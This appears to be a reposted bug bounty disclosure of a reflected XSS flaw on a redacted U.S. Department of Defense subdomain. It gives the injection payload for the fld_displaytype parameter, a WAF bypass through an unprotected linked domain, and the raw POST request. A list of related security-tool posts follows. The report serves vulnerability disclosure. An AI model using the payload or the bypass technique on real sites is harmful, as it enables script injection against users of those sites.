➠ U.S. Dept Of Defense: [XSS] Reflected XSS via POST request
Description: XSS vulnerability found on one of █████████ subdomains. [ DoD scope] After analyzing https://██████████/ I found ██████/████████-historic.cfm page that send some parameters to servers. fld_displaytype parameter vulnerable to XSS vulnerability. fld_displaytype=S changed to fld_displaytype=S"%20accesskey%3d"X"%20onclick%3d"alert('XSS Success!') WAF deployed on the endpoint to prevent such a attacks but I found another domain linked to this host but WAF did not cover that so I success to fire the payload. By sending the POST request to https://█████████████████/ , payload has been successfully triggered. ``` POST /██████/███████-historic.cfm HTTP/1.1 Host: █████████ Cookie: CFID=29878711; CFTOKEN=71972184 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 347 Origin: null Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close fld_graphfs=Y&fld_graphrs=N&fld_graphy1=N&fld_graphy2=N&fld_normal=Y&fld_max=Y&fld_min=Y&Submit=View-Graph&fld_from1=01%2F01%2F2023&fld_to1=12%2F31%2F2023&fld_displaytype=S"%20accesskey%3d"X"%20onclick%3d"alert('XSS......
Zur Startseite
➤ Ähnliche Beiträge für 'U.S. Dept Of Defense: [XSS] Reflected XSS via POST request'
XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool
vom 779.19 Punkte
XSpear is XSS Scanner on ruby gemsKey featuresPattern matching based XSS scanningDetect alert confirm prompt event on headless browser (with Selenium)Testing request/response for XSS protection bypass and reflected(or all) paramsReflected ParamsAll params(f
Student Management System | Django |
vom 538.95 Punkte
Student Management System is a system for Students where Students can check their details. In this system, a Admin Panel is included where admin can add students, add faculty and create notices.
Create A Django Project
django-admin startproject sms
Cr
Everything about Cross-Site Scripting (XSS)
vom 528.13 Punkte
During surfing the web sometimes we welcomed with a pop-up, after entering a web page. Even on our website now have a pop-up for the very first time. Suppose our system can be attacked by these pop-ups, may be malicious payloads comes in to our system or
CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints
vom 317.29 Punkte
REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and headerIntelligent: tests are generated based on data types and constraint
NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations
vom 303.82 Punkte
A plea for network defenders and software manufacturers to fix common problems.
EXECUTIVE SUMMARY
The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to h
NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations
vom 303.82 Punkte
A plea for network defenders and software manufacturers to fix common problems.
EXECUTIVE SUMMARY
The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to h
XSpear - Powerfull XSS Scanning And Parameter Analysis Tool
vom 286.96 Punkte
XSpear is XSS Scanner on ruby gems.Key features
Pattern matching based XSS scanning
Detect alert confirm prompt event on headless browser (with Selenium)
Testing request/response for XSS protection bypass and reflected params
Reflected Params
Filtered test
Request Tracing in Node.js
vom 259.23 Punkte
There’s a saying that software developers like us spend 90% of our time on debugging, and only 10% of our time actually writing code. This is a bit of an exaggeration! It is true that debugging is a significant part of our work, though, especially in
RedWarden - Flexible CobaltStrike Malleable Redirector
vom 247.69 Punkte
RedWarden - Flexible CobaltStrike Malleable Redirector(previously known as proxy2's malleable_redirector plugin) Let's raise the bar in C2 redirectors IR resiliency, shall we? Red Teaming business has seen several different great ideas on how to combat incident responders and misdirect them while offering resistant C2 redirectors network at the same time. Thi
Server Side Rendering a Blog with Web Components
vom 216.27 Punkte
This blog post supports a Youtube Livestream scheduled for Wednesday 4/19 at 12pm EST / 9am PST. You can watch the livestream here on Youtube.
Introduction
It has never been easier to server side render a website. Years ago it took server sid
Git All The Payloads! A Collection Of Web Attack Payloads
vom 211.4 Punkte
Git All the Payloads! A collection of web attack payloads. Pull requests are welcome!Usagerun ./get.sh to download external payloads and unzip any payload files that are compressed.Payload Creditsfuzzdb - https://github.com/fuzzdb-project/fuzzdbSec
Axios GET and POST examples
vom 207.6 Punkte
This article was originally published on the DeadSimpleChat Blog: Axios GET and POST examples
In this article, we are going to learn about how to send get and post requests with Axios. Axios is a promise-based HTTP client for the browser and node.j